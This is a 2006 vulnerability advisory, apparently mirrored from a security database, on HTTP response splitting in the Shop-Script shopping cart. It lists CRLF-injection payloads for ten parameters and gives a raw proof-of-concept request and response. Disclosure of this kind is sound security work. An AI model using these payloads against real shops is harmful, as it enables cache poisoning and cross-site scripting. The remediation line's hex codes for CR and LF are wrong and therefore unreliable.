Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14817
HistoryOct 26, 2006 - 12:00 a.m.

Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT

2006-10-2600:00:00
vulners.com
67
JSON

Vendor: Shop-Script (a division of WebAsyst LLC)
Application: Shop-Script (www.shop-script.com)

I. Descriptions:

Shop-Script is a PHP based shopping cart. Multiple links of
shop-script are vulnerable to a new form of application attack

technique called HTTP Response splitting (aka CRLF Injection). HTTP
Response Splitting enables an attacker to alter the HTTP

response header structure which can leads to various range of attacks
such as web cache poisoning, temporary defacement,

hijacking pages or cross-site scripting (XSS). This happens since the
user input is injected into the value section of http

header without properly escaping/removing CRLF characters which can
leads to two HTTP responses instead of one response.

II. Affected Links:

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?news=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?search_with_change_category_ability=%0d%0aFakeHeader:
Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?logging=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?feedback=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?show_price=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?register=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?answer=%0d%0aFakeHeader:Fake_Custom_Header&save_v
oting_results=yes
HTTP/1.0
POST /premium/index.php?productID=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?searchstring=<any_keyword>&inside=%0d%0aFakeHeade
r:Fake_Custom_Header
HTTP/1.0

III. Proof-of-concept:

[Request Header]

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
Accept: /
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET
CLR 1.1.4322)
Host: www.shop-script-demo.com
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache

current_currency=1

[Response Header]

HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header <= [Custome remsponse injected by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html

IV. Remediation:
Sanitize CR(0x13) and LF(0x10) from the user input or properly encode
the output in order to prevent the injection of custom

HTTP headers.

V. Reference:
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html

VI. Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com

For more vulnerabilities visit -
http://hackingspirits.com/vuln-rnd/vuln-rnd.html

JSON